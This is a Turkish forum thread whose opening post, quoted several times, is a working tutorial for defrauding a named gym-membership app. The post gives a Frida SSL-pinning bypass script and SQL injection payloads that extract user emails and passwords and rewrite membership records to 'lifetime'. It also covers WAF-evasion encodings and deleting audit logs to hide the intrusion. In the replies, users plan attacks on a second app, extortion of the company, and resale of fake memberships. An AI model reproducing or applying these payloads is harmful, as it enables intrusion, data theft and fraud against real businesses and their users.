LEAKING GYMTEKNO (SINIRSIZ UYELIK)

iluvanavar

iluvanavar

just for entertaiment purposes.
Joined
Jun 10, 2026
Posts
866
Reputation
889
Sımdı arkadaslar oncelıkle bastan soyluorum yapacagımız ıslem ufakta olsa codıng bılgısı gerektırecektık sımdı hızlıca gecıyorum
Gereklı uygulamalar
bilgisayar Windows, Mac, Linux fark etmez

Burp Suite Community

Android Studio içindeki sanal cihaz (AVD)

ADB (Android Debug Bridge)

OpenSSL

Frida ve Frida-server

JADX-GUI

Python 3


Simdi oncelikle burptan sertıfıkayı almadan once sunu demelıyım artık cogu sıstem androıd 7 ve uzerı kullandıgı ıcın ıse yaramaz o yuzden o yuzden sıstem sertıfıkası olarak sokmak zorundaız o yuzden
Burpta sertıfıkayı dısa aktırdıktan sonra Burp > Proxy > Options > Import/Export CA Certificate > Export > Certificate in DER format. bunlardan sonra elımızde cacert.der dıye bır dosya olacak
Sımdı bu dosyayı spoılerde verdıgım kod ıle OPENSSL ile PEM yabcaz
openssl x509 -inform DER -in cacert.der -out cacert.pem

Sımdı androıdın bunu tanıması ıcın bu hash ıle degıstırmek gerek o yuzden asagıdakı kod ıle bunu saglıyoruz
bash
openssl x509 -inform PEM -subject_hash_old -in cacert.pem | head -1
simdi random sayılı bır dosya olucak elımızde (aslında oyle deıl)
Sımdı PEM dosyasının adını bu hash ıle degısıp uzantısını .0 yapıyoruz
bash
mv cacert.pem 9a5ba575.0
Simdi bu dosyayı androıdın sıstemıne aktarıyoruz emulatoru baslattıktan sonra ADB ıle duzenlenebılır hale getırıoz
bash
adb root
adb remount
Dosyayı itekliyoruz
bash
adb push 9a5ba575.0 /system/etc/security/cacerts/
izinleri ayarlioyuz simdi takip edin
bash
adb shell chmod 644 /system/etc/security/cacerts/9a5ba575.0
emulatoru bu asamadan sonra restart ıle yenıden baslatın
SIMDI COK ONEMLI BI YER SSL PINLICEZ KI FRIDA ILE ISIMIZI GORECEGIZ.
Telefona frida-serverı atıp çalıştırıoyuz
bash
adb push frida-server /data/local/tmp/
adb shell chmod 755 /data/local/tmp/frida-server
adb shell /data/local/tmp/frida-server &
Sonra pcde asagıdakı javascript kodunu bypass.js diye kaydedın
javascript
Java.perform(function() {
// OkHttp
try {
var CertificatePinner = Java.use("okhttp3.CertificatePinner");
CertificatePinner.check.overload('java.lang.String', 'java.util.List').implementation = function(hostname, peerCertificates) {
console.log("[+] Pin atlandi: " + hostname);
return;
};
} catch(e) {}

//
try {
var TrustManager = Java.use("com.android.org.conscrypt.TrustManagerImpl");
TrustManager.checkServerTrusted.implementation = function(chain, authType) {
console.log("[+] TrustManager bypass");
return;
};
} catch(e) {}

//
try {
var SSLContext = Java.use("javax.net.ssl.SSLContext");
SSLContext.init.overload('[Ljavax.net.ssl.KeyManager;', '[Ljavax.net.ssl.TrustManager;', 'java.security.SecureRandom').implementation = function(km, tm, sr) {
console.log("[+] SSLContext bypass");
var TrustManagerFactory = Java.use("javax.net.ssl.TrustManagerFactory");
var tmf = TrustManagerFactory.getInstance("X509");
tmf.init(null);
var tm_array = tmf.getTrustManagers();
return this.init(km, tm_array, sr);
};
} catch(e) {}
});
Şimdi bu betiği uygulamaya enjekte ediniz ve paket ismini adb shell pm list packages | grep gym veya benzeri bir şeyle bul
bash
frida -U -f com.gymtekno.uygulama -l bypass.js --no-pause
Bu çalıştığında uygulama açılacak ve Burp artık tüm trafiği yakalamaya başlayacak
Simdi Burası da cok onemlı cunku API ve parametleri arioz.
Şimdi JADX-GUI’yi aç, APK dosyasını içine sürükle
Orada https://api., Authorization, Bearer gibi kelimeleri ara. Hangi endpointler var bakioruz bu zamandan zamana degısıor
Örneğin GET /v1/users/profile?userId=1234 gibi bir istek görürsen dırekt amına koymus oluyorsunuz neyse,
Simdi SQL INJECTION veritabanına erismis olmaktaız
Bu parametreye tırnak işareti (') ekleyip gönder
Eğer gelen cevapta SQL syntax error, MySQL, PostgreSQL, ORA gibi bir hata mesajı varsa, işlem tamamdır
Hangi veritabanını kullandıklarını ogrenmek ıcın sunu denıcez
text
userId=1234' AND 1=1--
Bu olursa bunu deneyın
text
userId=1234' AND 1=2--
SIMDI ARKADASLAR BURDA GEREKLI OLAN VERITABANI TIPINI BULDUKTAN SONRA YAPMAMIZ GEREKEN SEY GYMTEKNOYA KAYITOLDUGUNUZ TELEFON NUMARASI GMAİL GİBİ BİLGİLERİ BU PARAMATERE DE ARATIYORSUNUZ DİYELİM Kİ @looksmax.org DİYE BİR MAIL ILE KAYDOLDUNUZ NEYSE SU SEY ILE MANUEL TARAMA YAPACAKSINIZ
text
userId=1234' UNION SELECT null, user_id, email, sifre FROM users WHERE email='[email protected]'--
YUKARDA [email protected] YAZDIGIM YERE KENDI NUMARANIZI MAAILIZNIZI GEREKLI YERE DOGRU BIR SEKILDE YAZIONUZ
ORDA KI IDYI ALIYORSUNUZ DIYELIM KI 3169 CIKTI
BU IDYI SURDA KULLANACAGIZ
AMA ONCELIKLE BURDA YAPACAGAMIZ SEY DEGISKEN VERITABANINA GORE ISLEM YAPMAK TEK TEK ASSAGIYA BIRAKIYORUM
Eger hata mesajında com.mysql.jdbc yazıyorsa (MySQL/MariaDB)
text
userId=1234'; UPDATE uyelikler SET bitis_tarihi = DATE_ADD(bitis_tarihi, INTERVAL 365 DAY), plan_tip = 'lifetime' WHERE kullanici_id = 3169;--
BUNU
Eğer hata mesajında org.postgresql yazıyorsa (PostgreSQL)
text
userId=1234'; UPDATE uyelikler SET bitis_tarihi = bitis_tarihi + INTERVAL '1 year', plan_tip = 'lifetime' WHERE kullanici_id = 3169;--
BUNU YAZIYORUZ
Eğer hata mesajında com.microsoft.sqlserver yazıyorsa (MSSQL)
text
userId=1234'; UPDATE uyelikler SET bitis_tarihi = DATEADD(YEAR, 1, bitis_tarihi), plan_tip = 'lifetime' WHERE kullanici_id = 3169;--
EGER WAF(GUVENLIK DUVARI)BIZI ENGELLERSE
PAYLOADI MANIPULE ETMEK ICIN SU ISLEMLERI YAPACAGIZ
Büyük küçük harf degistir Or, oR, 1=1

Yorum satırı '/**/OR/**/1=1/**/--

URL encode yap %27%20%4F%52%20%31%3D%31

Null byte dene: 1'%00 1=1--

Hex kullan 0x27204F5220313D31
EN SON OLARAK SISTEM TARAFINDAN YAKALANMAMAK ICIN
Tüm bu işlemleri yaparken gönderdiğin sorgunun loglara düşmemesi için işin bittiğinde audit_log veya access_log tablosundan YAPTIGIMIZ DEGISIKLIKLERI SILIYORUZ
BU KADARDI ARKADASLAR BOYLELIKLE GYMTEKNONUN SQL SISTEMINE SIZIP VERIDATASI UZERINDE DEGISIKLIKLER YAPABILIYORUZ
 
Last edited:
  • +1
  • Woah
  • Love it
Reactions: Orcairis, Naughty America, Pearex and 7 others
Sımdı arkadaslar oncelıkle bastan soyluorum yapacagımız ıslem ufakta olsa codıng bılgısı gerektırecektık sımdı hızlıca gecıyorum
Gereklı uygulamalar
bilgisayar Windows, Mac, Linux fark etmez

Burp Suite Community

Android Studio içindeki sanal cihaz (AVD)

ADB (Android Debug Bridge)

OpenSSL

Frida ve Frida-server

JADX-GUI

Python 3


Simdi oncelikle burptan sertıfıkayı almadan once sunu demelıyım artık cogu sıstem androıd 7 ve uzerı kullandıgı ıcın ıse yaramaz o yuzden o yuzden sıstem sertıfıkası olarak sokmak zorundaız o yuzden
Burpta sertıfıkayı dısa aktırdıktan sonra Burp > Proxy > Options > Import/Export CA Certificate > Export > Certificate in DER format. bunlardan sonra elımızde cacert.der dıye bır dosya olacak
Sımdı bu dosyayı spoılerde verdıgım kod ıle OPENSSL ile PEM yabcaz
openssl x509 -inform DER -in cacert.der -out cacert.pem

Sımdı androıdın bunu tanıması ıcın bu hash ıle degıstırmek gerek o yuzden asagıdakı kod ıle bunu saglıyoruz
bash
openssl x509 -inform PEM -subject_hash_old -in cacert.pem | head -1
simdi random sayılı bır dosya olucak elımızde (aslında oyle deıl)
Sımdı PEM dosyasının adını bu hash ıle degısıp uzantısını .0 yapıyoruz
bash
mv cacert.pem 9a5ba575.0
Simdi bu dosyayı androıdın sıstemıne aktarıyoruz emulatoru baslattıktan sonra ADB ıle duzenlenebılır hale getırıoz
bash
adb root
adb remount
Dosyayı itekliyoruz
bash
adb push 9a5ba575.0 /system/etc/security/cacerts/
izinleri ayarlioyuz simdi takip edin
bash
adb shell chmod 644 /system/etc/security/cacerts/9a5ba575.0
emulatoru bu asamadan sonra restart ıle yenıden baslatın
SIMDI COK ONEMLI BI YER SSL PINLICEZ KI FRIDA ILE ISIMIZI GORECEGIZ.
Telefona frida-serverı atıp çalıştırıoyuz
bash
adb push frida-server /data/local/tmp/
adb shell chmod 755 /data/local/tmp/frida-server
adb shell /data/local/tmp/frida-server &
Sonra pcde asagıdakı javascript kodunu bypass.js diye kaydedın
javascript
Java.perform(function() {
// OkHttp
try {
var CertificatePinner = Java.use("okhttp3.CertificatePinner");
CertificatePinner.check.overload('java.lang.String', 'java.util.List').implementation = function(hostname, peerCertificates) {
console.log("[+] Pin atlandi: " + hostname);
return;
};
} catch(e) {}

//
try {
var TrustManager = Java.use("com.android.org.conscrypt.TrustManagerImpl");
TrustManager.checkServerTrusted.implementation = function(chain, authType) {
console.log("[+] TrustManager bypass");
return;
};
} catch(e) {}

//
try {
var SSLContext = Java.use("javax.net.ssl.SSLContext");
SSLContext.init.overload('[Ljavax.net.ssl.KeyManager;', '[Ljavax.net.ssl.TrustManager;', 'java.security.SecureRandom').implementation = function(km, tm, sr) {
console.log("[+] SSLContext bypass");
var TrustManagerFactory = Java.use("javax.net.ssl.TrustManagerFactory");
var tmf = TrustManagerFactory.getInstance("X509");
tmf.init(null);
var tm_array = tmf.getTrustManagers();
return this.init(km, tm_array, sr);
};
} catch(e) {}
});
Şimdi bu betiği uygulamaya enjekte ediniz ve paket ismini adb shell pm list packages | grep gym veya benzeri bir şeyle bul
bash
frida -U -f com.gymtekno.uygulama -l bypass.js --no-pause
Bu çalıştığında uygulama açılacak ve Burp artık tüm trafiği yakalamaya başlayacak
Simdi Burası da cok onemlı cunku API ve parametleri arioz.
Şimdi JADX-GUI’yi aç, APK dosyasını içine sürükle
Orada https://api., Authorization, Bearer gibi kelimeleri ara. Hangi endpointler var bakioruz bu zamandan zamana degısıor
Örneğin GET /v1/users/profile?userId=1234 gibi bir istek görürsen dırekt amına koymus oluyorsunuz neyse,
Simdi SQL INJECTION veritabanına erismis olmaktaız
Bu parametreye tırnak işareti (') ekleyip gönder
Eğer gelen cevapta SQL syntax error, MySQL, PostgreSQL, ORA gibi bir hata mesajı varsa, işlem tamamdır
Hangi veritabanını kullandıklarını ogrenmek ıcın sunu denıcez
text
userId=1234' AND 1=1--
Bu olursa bunu deneyın
text
userId=1234' AND 1=2--
SIMDI ARKADASLAR BURDA GEREKLI OLAN VERITABANI TIPINI BULDUKTAN SONRA YAPMAMIZ GEREKEN SEY GYMTEKNOYA KAYITOLDUGUNUZ TELEFON NUMARASI GMAİL GİBİ BİLGİLERİ BU PARAMATERE DE ARATIYORSUNUZ DİYELİM Kİ @looksmax.org DİYE BİR MAIL ILE KAYDOLDUNUZ NEYSE SU SEY ILE MANUEL TARAMA YAPACAKSINIZ
text
userId=1234' UNION SELECT null, user_id, email, sifre FROM users WHERE email='[email protected]'--
YUKARDA [email protected] YAZDIGIM YERE KENDI NUMARANIZI MAAILIZNIZI GEREKLI YERE DOGRU BIR SEKILDE YAZIONUZ
ORDA KI IDYI ALIYORSUNUZ DIYELIM KI 3169 CIKTI
BU IDYI SURDA KULLANACAGIZ
AMA ONCELIKLE BURDA YAPACAGAMIZ SEY DEGISKEN VERITABANINA GORE ISLEM YAPMAK TEK TEK ASSAGIYA BIRAKIYORUM
Eger hata mesajında com.mysql.jdbc yazıyorsa (MySQL/MariaDB)
text
userId=1234'; UPDATE uyelikler SET bitis_tarihi = DATE_ADD(bitis_tarihi, INTERVAL 365 DAY), plan_tip = 'lifetime' WHERE kullanici_id = 3169;--
BUNU
Eğer hata mesajında org.postgresql yazıyorsa (PostgreSQL)
text
userId=1234'; UPDATE uyelikler SET bitis_tarihi = bitis_tarihi + INTERVAL '1 year', plan_tip = 'lifetime' WHERE kullanici_id = 3169;--
BUNU YAZIYORUZ
Eğer hata mesajında com.microsoft.sqlserver yazıyorsa (MSSQL)
text
userId=1234'; UPDATE uyelikler SET bitis_tarihi = DATEADD(YEAR, 1, bitis_tarihi), plan_tip = 'lifetime' WHERE kullanici_id = 3169;--
EGER WAF(GUVENLIK DUVARI)BIZI ENGELLERSE
PAYLOADI MANIPULE ETMEK ICIN SU ISLEMLERI YAPACAGIZ
Büyük küçük harf degistir Or, oR, 1=1

Yorum satırı '/**/OR/**/1=1/**/--

URL encode yap %27%20%4F%52%20%31%3D%31

Null byte dene: 1'%00 1=1--

Hex kullan 0x27204F5220313D31
EN SON OLARAK SISTEM TARAFINDAN YAKALANMAMAK ICIN
Tüm bu işlemleri yaparken gönderdiğin sorgunun loglara düşmemesi için işin bittiğinde audit_log veya access_log tablosundan YAPTIGIMIZ DEGISIKLIKLERI SILIYORUZ
BU KADARDI ARKADASLAR BOYLELIKLE GYMTEKNONUN SQL SISTEMINE SIZIP VERIDATASI UZERINDE DEGISIKLIKLER YAPABILIYORUZ
 

Attachments

  • images (20).jpeg
    images (20).jpeg
    29.3 KB · Views: 0
  • +1
  • JFL
  • Love it
Reactions: coax96, Naughty America, Thrill and 3 others
yaparken bı cut ıle karsılasırsanız buraya yazın fıxını bılıom,eklemeyı unutmus olabılırım cunku threade
 
  • +1
Reactions: Naughty America, Pearex, Thrill and 1 other person
@susisesi @Thrill @murad.89
 
  • JFL
  • +1
Reactions: Thrill, -BayHarbourButcher and Demirs
Hemen yetkililere bildiriyorum
 
  • JFL
Reactions: Thrill and ankaranin_adami
gymtekno ney lan
 
  • +1
Reactions: Thrill and iluvanavar
Sımdı arkadaslar oncelıkle bastan soyluorum yapacagımız ıslem ufakta olsa codıng bılgısı gerektırecektık sımdı hızlıca gecıyorum
Gereklı uygulamalar
bilgisayar Windows, Mac, Linux fark etmez

Burp Suite Community

Android Studio içindeki sanal cihaz (AVD)

ADB (Android Debug Bridge)

OpenSSL

Frida ve Frida-server

JADX-GUI

Python 3


Simdi oncelikle burptan sertıfıkayı almadan once sunu demelıyım artık cogu sıstem androıd 7 ve uzerı kullandıgı ıcın ıse yaramaz o yuzden o yuzden sıstem sertıfıkası olarak sokmak zorundaız o yuzden
Burpta sertıfıkayı dısa aktırdıktan sonra Burp > Proxy > Options > Import/Export CA Certificate > Export > Certificate in DER format. bunlardan sonra elımızde cacert.der dıye bır dosya olacak
Sımdı bu dosyayı spoılerde verdıgım kod ıle OPENSSL ile PEM yabcaz
openssl x509 -inform DER -in cacert.der -out cacert.pem

Sımdı androıdın bunu tanıması ıcın bu hash ıle degıstırmek gerek o yuzden asagıdakı kod ıle bunu saglıyoruz
bash
openssl x509 -inform PEM -subject_hash_old -in cacert.pem | head -1
simdi random sayılı bır dosya olucak elımızde (aslında oyle deıl)
Sımdı PEM dosyasının adını bu hash ıle degısıp uzantısını .0 yapıyoruz
bash
mv cacert.pem 9a5ba575.0
Simdi bu dosyayı androıdın sıstemıne aktarıyoruz emulatoru baslattıktan sonra ADB ıle duzenlenebılır hale getırıoz
bash
adb root
adb remount
Dosyayı itekliyoruz
bash
adb push 9a5ba575.0 /system/etc/security/cacerts/
izinleri ayarlioyuz simdi takip edin
bash
adb shell chmod 644 /system/etc/security/cacerts/9a5ba575.0
emulatoru bu asamadan sonra restart ıle yenıden baslatın
SIMDI COK ONEMLI BI YER SSL PINLICEZ KI FRIDA ILE ISIMIZI GORECEGIZ.
Telefona frida-serverı atıp çalıştırıoyuz
bash
adb push frida-server /data/local/tmp/
adb shell chmod 755 /data/local/tmp/frida-server
adb shell /data/local/tmp/frida-server &
Sonra pcde asagıdakı javascript kodunu bypass.js diye kaydedın
javascript
Java.perform(function() {
// OkHttp
try {
var CertificatePinner = Java.use("okhttp3.CertificatePinner");
CertificatePinner.check.overload('java.lang.String', 'java.util.List').implementation = function(hostname, peerCertificates) {
console.log("[+] Pin atlandi: " + hostname);
return;
};
} catch(e) {}

//
try {
var TrustManager = Java.use("com.android.org.conscrypt.TrustManagerImpl");
TrustManager.checkServerTrusted.implementation = function(chain, authType) {
console.log("[+] TrustManager bypass");
return;
};
} catch(e) {}

//
try {
var SSLContext = Java.use("javax.net.ssl.SSLContext");
SSLContext.init.overload('[Ljavax.net.ssl.KeyManager;', '[Ljavax.net.ssl.TrustManager;', 'java.security.SecureRandom').implementation = function(km, tm, sr) {
console.log("[+] SSLContext bypass");
var TrustManagerFactory = Java.use("javax.net.ssl.TrustManagerFactory");
var tmf = TrustManagerFactory.getInstance("X509");
tmf.init(null);
var tm_array = tmf.getTrustManagers();
return this.init(km, tm_array, sr);
};
} catch(e) {}
});
Şimdi bu betiği uygulamaya enjekte ediniz ve paket ismini adb shell pm list packages | grep gym veya benzeri bir şeyle bul
bash
frida -U -f com.gymtekno.uygulama -l bypass.js --no-pause
Bu çalıştığında uygulama açılacak ve Burp artık tüm trafiği yakalamaya başlayacak
Simdi Burası da cok onemlı cunku API ve parametleri arioz.
Şimdi JADX-GUI’yi aç, APK dosyasını içine sürükle
Orada https://api., Authorization, Bearer gibi kelimeleri ara. Hangi endpointler var bakioruz bu zamandan zamana degısıor
Örneğin GET /v1/users/profile?userId=1234 gibi bir istek görürsen dırekt amına koymus oluyorsunuz neyse,
Simdi SQL INJECTION veritabanına erismis olmaktaız
Bu parametreye tırnak işareti (') ekleyip gönder
Eğer gelen cevapta SQL syntax error, MySQL, PostgreSQL, ORA gibi bir hata mesajı varsa, işlem tamamdır
Hangi veritabanını kullandıklarını ogrenmek ıcın sunu denıcez
text
userId=1234' AND 1=1--
Bu olursa bunu deneyın
text
userId=1234' AND 1=2--
SIMDI ARKADASLAR BURDA GEREKLI OLAN VERITABANI TIPINI BULDUKTAN SONRA YAPMAMIZ GEREKEN SEY GYMTEKNOYA KAYITOLDUGUNUZ TELEFON NUMARASI GMAİL GİBİ BİLGİLERİ BU PARAMATERE DE ARATIYORSUNUZ DİYELİM Kİ @looksmax.org DİYE BİR MAIL ILE KAYDOLDUNUZ NEYSE SU SEY ILE MANUEL TARAMA YAPACAKSINIZ
text
userId=1234' UNION SELECT null, user_id, email, sifre FROM users WHERE email='[email protected]'--
YUKARDA [email protected] YAZDIGIM YERE KENDI NUMARANIZI MAAILIZNIZI GEREKLI YERE DOGRU BIR SEKILDE YAZIONUZ
ORDA KI IDYI ALIYORSUNUZ DIYELIM KI 3169 CIKTI
BU IDYI SURDA KULLANACAGIZ
AMA ONCELIKLE BURDA YAPACAGAMIZ SEY DEGISKEN VERITABANINA GORE ISLEM YAPMAK TEK TEK ASSAGIYA BIRAKIYORUM
Eger hata mesajında com.mysql.jdbc yazıyorsa (MySQL/MariaDB)
text
userId=1234'; UPDATE uyelikler SET bitis_tarihi = DATE_ADD(bitis_tarihi, INTERVAL 365 DAY), plan_tip = 'lifetime' WHERE kullanici_id = 3169;--
BUNU
Eğer hata mesajında org.postgresql yazıyorsa (PostgreSQL)
text
userId=1234'; UPDATE uyelikler SET bitis_tarihi = bitis_tarihi + INTERVAL '1 year', plan_tip = 'lifetime' WHERE kullanici_id = 3169;--
BUNU YAZIYORUZ
Eğer hata mesajında com.microsoft.sqlserver yazıyorsa (MSSQL)
text
userId=1234'; UPDATE uyelikler SET bitis_tarihi = DATEADD(YEAR, 1, bitis_tarihi), plan_tip = 'lifetime' WHERE kullanici_id = 3169;--
EGER WAF(GUVENLIK DUVARI)BIZI ENGELLERSE
PAYLOADI MANIPULE ETMEK ICIN SU ISLEMLERI YAPACAGIZ
Büyük küçük harf degistir Or, oR, 1=1

Yorum satırı '/**/OR/**/1=1/**/--

URL encode yap %27%20%4F%52%20%31%3D%31

Null byte dene: 1'%00 1=1--

Hex kullan 0x27204F5220313D31
EN SON OLARAK SISTEM TARAFINDAN YAKALANMAMAK ICIN
Tüm bu işlemleri yaparken gönderdiğin sorgunun loglara düşmemesi için işin bittiğinde audit_log veya access_log tablosundan YAPTIGIMIZ DEGISIKLIKLERI SILIYORUZ
BU KADARDI ARKADASLAR BOYLELIKLE GYMTEKNONUN SQL SISTEMINE SIZIP VERIDATASI UZERINDE DEGISIKLIKLER YAPABILIYORUZ
bunu yapcak adam forumda yok bide sen nasıl biliyon bunu yemeksepetine getire falan yap bilgilerden bakiyeyi 99999 tl yapsana bi
 
  • +1
Reactions: Thrill and iluvanavar
uçağa binme yahudilerin oynunu çökertmişsin
 
  • +1
Reactions: Thrill and iluvanavar
bunu yapcak adam forumda yok bide sen nasıl biliyon bunu yemeksepetine getire falan yap bilgilerden bakiyeyi 99999 tl yapsana bi
onlarin sql ve api protectionlari cok saglam denemedim degil ama bunun gibi uygulamalarfa yapilio
 
  • +1
Reactions: Naughty America and Thrill
bump
 
  • +1
Reactions: Thrill
Ananın amı hocam
 
  • JFL
  • +1
Reactions: cakdripa, Thrill, arseth6 and 1 other person
onlarin sql ve api protectionlari cok saglam denemedim degil ama bunun gibi uygulamalarfa yapilio
olm denede biz ankarada buluşunca marketten çiğ et falan söyleriz yemek yiye yiye obez oluruz bak dene ama sadece sorana at metodu
 
  • +1
Reactions: Thrill and iluvanavar
kanka bizim sipor salonu varda bunu yapanları nasıl anlayabiliriz
 
  • +1
Reactions: Thrill and iluvanavar
olm denede biz ankarada buluşunca marketten çiğ et falan söyleriz yemek yiye yiye obez oluruz bak dene ama sadece sorana at metodu
cig et primal beslenek yani
 
  • +1
Reactions: Thrill
gymtekno mu kullanio,ve anliyamazsin ve yapan oldugunu sanmiyorum
gymtekno kullanıyoz
kanka çok korkuyom babamın hakkıan girerler diye siker öldürürüm oçun evlatlarını
 
  • JFL
Reactions: Thrill and iluvanavar
gymtekno kullanıyoz
kanka çok korkuyom babamın hakkıan girerler diye siker öldürürüm oçun evlatlarını
knk yapan var mi diye anlarim da sizin admin panele girmem gerek cok
 
  • +1
Reactions: Thrill and blackpillruinedmyli
knk yapan var mi diye anlarim da sizin admin panele girmem gerek cok sanmiyomnama yapanin oldugunu
knk inş yoktur
bu panelde sağda giriş yapmış olarak gözüküyo ya isimler orda ne çıkıyo
 
  • +1
Reactions: Thrill and iluvanavar
  • +1
Reactions: Thrill and iluvanavar
giriş yapan üyelerin ismi gözüküyo panelde orda ne çıkar isim olarak girdiğinde
bişey çıkmaz heralde
hayir kendi ismiyle sureyi uzatabilir herhangi bir veriyi degistirilebiluyir
 
  • +1
Reactions: Thrill and blackpillruinedmyli
hayir kendi ismiyle sureyi uzatabilir herhangi bir veriyi degistirilebiluyir
ebesinin amı amk
aga bunu sen bulduysan helal olsun mr robot gibi bişeysin yani anladığım
 
  • JFL
  • +1
  • Love it
Reactions: Thrill, ascndndfrgt, ankaranin_adami and 1 other person
forumda buna kimse uğraşmaz bence
 
  • +1
Reactions: iluvanavar and Thrill
Okumadım ama helal olsun knk mirin
 
  • +1
Reactions: iluvanavar, Thrill and veneficus
  • +1
Reactions: iluvanavar and Thrill
Olm kurye sikme thrradinden sonra su seviyede bisey beklemiyodum sen neymişsin laaaaaa mirin
 
  • +1
Reactions: erlang, iluvanavar and ascndndfrgt
onlarin sql ve api protectionlari cok saglam denemedim degil ama bunun gibi uygulamalarfa yapilio
kanka bikaç aydır buna bakıyorum gymteknoda çözdüm de maksi mobili reverseleyemedim baksana bi sende amk baya dbye eristim de plesk kullanmislar
 
  • +1
Reactions: Thrill and iluvanavar
kanka bikaç aydır buna bakıyorum gymteknoda çözdüm de maksi mobili reverseleyemedim baksana bi sende amk baya dbye eristim de plesk kullanmislar
hangi sql kullaniolar
 
  • +1
Reactions: Thrill
yav orospu cocuklarinin waf cok iyi konfigüre edilmis aminakoyim acik yok gibi bise
aga olabilir valla bu sql injection gymtekno da ise yaradi digerlerin de olmadi,waf cozulmucek bi sorun degil aslinda bakilmasi gerek
 
  • +1
Reactions: Thrill
aga olabilir valla bu sql injection gymtekno da ise yaradi digerlerin de olmadi,waf cozulmucek bi sorun degil aslinda bakilmasi gerek
bakcam bakcam dur olursa haber edicem su an demo sitesinden rce chainle diğer dbleri cekmeyi deniyom olmazsa sql inje geri doncem
 
  • +1
Reactions: Thrill and iluvanavar
bakcam bakcam dur olursa haber edicem su an demo sitesinden rce chainle diğer dbleri cekmeyi deniyom olmazsa sql inje geri doncem
tmamdir bak bakalim
 
  • +1
Reactions: Thrill
BEYLER MAKSİYİ SİKMEK İÇİN KENDİ MAKSİ HESABIMI FEDA EDİYORUM GYMDEN KOVULURSAM O7 CAKIN
 
  • +1
Reactions: Thrill and iluvanavar
BEYLER MAKSİYİ SİKMEK İÇİN KENDİ MAKSİ HESABIMI FEDA EDİYORUM GYMDEN KOVULURSAM O7 CAKIN
var _0x505c0e = (function(_0x...,_0x...) {...}([...], 0x...)); // returns string array or decoder
var _0x3494a5 = function(_0x..., _0x...) { ... return _0x505c0e[_0x...]; } // decoder wrapper
...
_0x2d3d03 = _0x3494a5 (aliases)

uygulamalarında kullandıkları obfuscator :lul::lul::lul::lul:
 
var _0x505c0e = (function(_0x...,_0x...) {...}([...], 0x...)); // returns string array or decoder
var _0x3494a5 = function(_0x..., _0x...) { ... return _0x505c0e[_0x...]; } // decoder wrapper
...
_0x2d3d03 = _0x3494a5 (aliases)

uygulamalarında kullandıkları obfuscator :lul::lul::lul::lul:
dur kuzen
 
dur kuzen
tüm login4 apisini deobfluyom şu an yapabilirsem her şeyi çekicem en kötü maksiye mail atarım açık buldum isterseniz cozerim para verin fln diye siklemezlerse de inf gün basarım hesaba her 3 ayda bir beles giderim hep
 
  • +1
Reactions: Thrill, ascndndfrgt and iluvanavar
Olm kurye sikme thrradinden sonra su seviyede bisey beklemiyodum sen neymişsin laaaaaa mirin
Kanka kuryeler orospu çocuğu mu niye her şeyi kuryelerden biliyonuz firmadan gidiyor mcdonaldın sikindemi senin whopperin eksik mi değil mi he söyle
 
tüm login4 apisini deobfluyom şu an yapabilirsem her şeyi çekicem en kötü maksiye mail atarım açık buldum isterseniz cozerim para verin fln diye siklemezlerse de inf gün basarım hesaba her 3 ayda bir beles giderim hep
Lan söyleme aq taşşak mı geçiyon bize nolcak bencillik yapma
 
  • JFL
Reactions: iluvanavar
tüm login4 apisini deobfluyom şu an yapabilirsem her şeyi çekicem en kötü maksiye mail atarım açık buldum isterseniz cozerim para verin fln diye siklemezlerse de inf gün basarım hesaba her 3 ayda bir beles giderim hep
mail fln atma mk cokerler,salonda ki arkadaslarina yari fiyatina uyelik gec kendin girme
 

Similar threads

iluvanavar
Replies
19
Views
253
ankaranin_adami
ankaranin_adami
Pearex
Replies
0
Views
38
Pearex
Pearex
mardinli
Replies
3
Views
29
ankaranin_adami
ankaranin_adami
caglar3
Replies
10
Views
117
Trenmaxx1
Trenmaxx1

Users who are viewing this thread

Back
Top